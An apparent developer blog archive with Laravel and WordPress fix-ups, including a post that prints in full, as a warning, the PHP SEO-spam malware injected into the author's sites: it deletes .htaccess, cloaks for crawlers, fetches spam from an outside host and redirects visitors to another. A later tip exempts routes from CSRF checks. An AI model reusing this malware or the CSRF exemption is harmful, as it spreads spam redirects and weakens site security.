Monthly Archive: April 2019

Change Timezone in Laravel 5

Problem: In Laravel, the created_at and updated_at attribute in database value are incorrect when users trying to create and update data.

Solution: Change the timezone value in /config/app.php. The timezone list can be found at https://www.w3schools.com/php/php_ref_timezones.asp

    /*
    |--------------------------------------------------------------------------
    | Application Timezone
    |--------------------------------------------------------------------------
    |
    | Here you may specify the default timezone for your application, which
    | will be used by the PHP date and date-time functions. We have gone
    | ahead and set this to a sensible default for you out of the box.
    |
    */

    'timezone' => 'Asia/Taipei',  

WordPress plugin install/update: Could not create directory

Problem: Try to install or update a plugin in WordPress by upload file or install package in WordPress. The user got this error: Could not create directory. (path) or An error occurred while updating (package): Could not create directory

Solution: Enter command in your porject: chown -R www-data:www-data wp-content

Website written by PHP (WordPress, OpenCart) Hacked by malware which starting with $user_agent_to_filter

How to find it: enter command --

sudo grep -r 'user_agent_to_filter' --include *.php /var/www

Problem:

1) The website may be tagged with “This site may be hacked” in Google search results.

2) The website with HTTPS will return error 500.

3) The website with non-HTTPS will be treated as a dangerous page by some Antivirus Software since it being injected an iframe to redirect a user to another website.

Solution:

  1. Update WordPress update plugin (wordfence)
  2. Change folder permission to 775 (or follow the original repository’s permission setting)
  3. Enforced SSL
  4. Delete all the infected files (You can find them all using sudo grep -r ‘user_agent_to_filter’ --include *.php /var/www/html)
  5. Use Cloudflare 🙂
Some of my websites (WordPress, OpenCart) have these injected files. The above images indicate these injected files located in /image/cache/catalog/demo/product/ on OpenCart platform

Below code is the injected content, Other websites also mentioned this malware. I will attached the links below.

<?php
// Below infected code is malware! Do not use it

$f1 = ".ht"; $f2 = "acc"; $f3 = "ess";
$ff = $f1.$f2.$f3;

if (file_exists($ff)) chmod ($ff, 0777);
if (file_exists($ff)) unlink ($ff);	

$cache_folder = "wtuds";
$template_folder = "nptoris";

$user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#',
                               '#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i',
                               '#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i','#www\.cys\.ru#i',
                               '#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i',
                               '#CFNetwork#i', '#ConveraCrawler#i','#DISCo#i', '#Download\s*Master#i', '#FAST\s*MetaWeb\s*Crawler#i',
                               '#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i',
                               '#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i',
                               '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i',
                               '#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i',
                               '#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i',
                               '#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i',
                               '#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i',
                               '#Yandex#i', '#Yanga#i', '#Yeti#i','#msnbot#i',
                               '#spider#i', '#yahoo#i', '#jeeves#i' ,'#google#i' ,'#altavista#i',
                               '#scooter#i' ,'#av\s*fetch#i' ,'#asterias#i' ,'#spiderthread revision#i' ,'#sqworm#i',
                               '#ask#i' ,'#lycos.spider#i' ,'#infoseek sidewinder#i' ,'#ultraseek#i' ,'#polybot#i',
                               '#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i',
                               '#charlotte#i', '#ngb#i', '#BingBot#i' ) ;

if ( !empty( $_SERVER['HTTP_USER_AGENT'] ) && ( FALSE !== strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) ){
    $isbot = 1;
	}

if( FALSE !== strpos( gethostbyaddr($_SERVER['REMOTE_ADDR']), 'google')) 
{
    $isbot = 1;
}



if ($isbot)
{
	
	$myname = $cache_folder."/".$_GET["jgyhdhuy"];
	if (file_exists($myname))
	{
	$html = file($myname);
	$html = implode($html, "");
	echo $html;
	exit;
	}
	
$template = scandir($template_folder);
$template = $template[rand(2,sizeof($template)-1)];
$tpl = $template_folder."/".$template;
$tpl = file($tpl);


$keyword = str_replace("-", " ", $_GET["jgyhdhuy"]);
$keyword = chop($keyword);
$keyword = ucfirst($keyword);


 $query_pars = $keyword;
 $query_pars_2 = str_replace(" ", "+", chop($query_pars));
 $query_pars_2 = mb_strtolower($query_pars_2);

 $text = ""; 
 
 $ch = curl_init();  
curl_setopt($ch, CURLOPT_URL, "http://picgures.pw/story2.php?q=$query_pars_2&pass=qwerty8"); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
$text = curl_exec($ch); 
curl_close($ch);
 
 if (strlen($text)<1000)
 {
	 
	 for ($page=1;$page<145;$page=$page+10)
{
$ch = curl_init();  
curl_setopt($ch, CURLOPT_URL, "https://www4.bing.com/search?q=$query_pars_2&first=$page"); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); 
//curl_setopt($ch, CURLOPT_USERAGENT,"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
$result = curl_exec($ch); 
curl_close($ch);
//echo $result;	

		preg_match_all ("#</div><p>(.*)</p></div>#iU",$result,$m);
		foreach ($m[1] as $a) $text .= $a;	

}
 
	
$text = str_replace("...", "", $text);
		$text = strip_tags($text); 
		$text = str_replace("  ", " ", $text);
		$text = str_replace("  ", " ", $text);
		$text = str_replace("  ", " ", $text);
		$text = str_replace("  ", " ", $text);
		$text = str_replace("  ", " ", $text);
		$text = str_replace("  ", " ", $text);
		$text = str_replace("  ", " ", $text);

		$text = explode(".", $text);
		shuffle($text);
		$text = array_unique($text);
		$text = implode(". ", $text);
 }

     	$html = implode ("\n", $tpl);
/*		
$titlename = $_SERVER['SERVER_NAME'];	
$titlename = explode(".", $titlename);
$titlename = strtoupper($titlename[0]);
if (strlen($titlename)>1) $html=str_replace("<title>{keyword}</title>", "<title>$keyword | $titlename</title>", $html);		
	*/	
		$html = str_replace("{keyword}", $keyword, $html);
		$html = str_replace("{manytext_bing}", $text, $html);
		
		$out = fopen($myname, "w");
		fwrite($out, $html);
		fclose($out);

		echo $html;
		
}	

if([email protected]$isbot)
{

$keyword = str_replace("-", " ", $_GET["jgyhdhuy"]);
$keyword = str_replace(" ", "+", $keyword);

$ref = $_SERVER["HTTP_REFERER"];
$d = $_SERVER["HTTP_HOST"];
$mykeys  = $_GET["jgyhdhuy"];

header("Location: http://imagger.pw/sf/77?d=$d&mykeys=$mykeys");

exit;
}

?>

Other relevant resources:

http://chensd.com/2011-09/a-wordpress-trojan-analyst.html (simplified chinese)
https://stackoverflow.com/questions/44534667/wordpress-website-hacked-according-to-google-is-it-really
https://blog.sucuri.net/2012/06/understanding-conditional-malware-ip-centric-variation.html
https://www.biaodianfu.com/site-hacked.html (simplified chinese)

419 error in laravel 5.6 when post route for testing

Problem: https://laracasts.com/discuss/channels/laravel/post-request-in-laravel-57-error-419-sorry-your-session-has-expired or just POST data to route. Having Error -- 419 Sorry, your session has expired.

Solution: If user just want to test the route using POST and don’t want to send csrf token, user can an exception for specific route in VerifyCsrfToken

VerifyCsrfToken .php

 
protected $except = [
'foo', // for route 'foo', this route can post without csrf token
'getReplytest', // for route 'getReplytest', this route can post without csrf token
];

405 error in laravel 5.6 using ajax

Problem: get error 405 when post URL

Laravel use csrf by default, you can add CSRF token in the form:

<form method="POST" action="/post_route" >
@csrf
...
</form>

But if you are using ajax to past data, you can add below code:

<!-- HTML-->
<meta name="csrf-token" content="{{ csrf_token() }}">
/* JQuery */
$.ajaxSetup({
headers: {
'X-CSRF-TOKEN': $('meta[name="csrf-token"]').attr('content')
}
});
Close Bitnami banner
Bitnami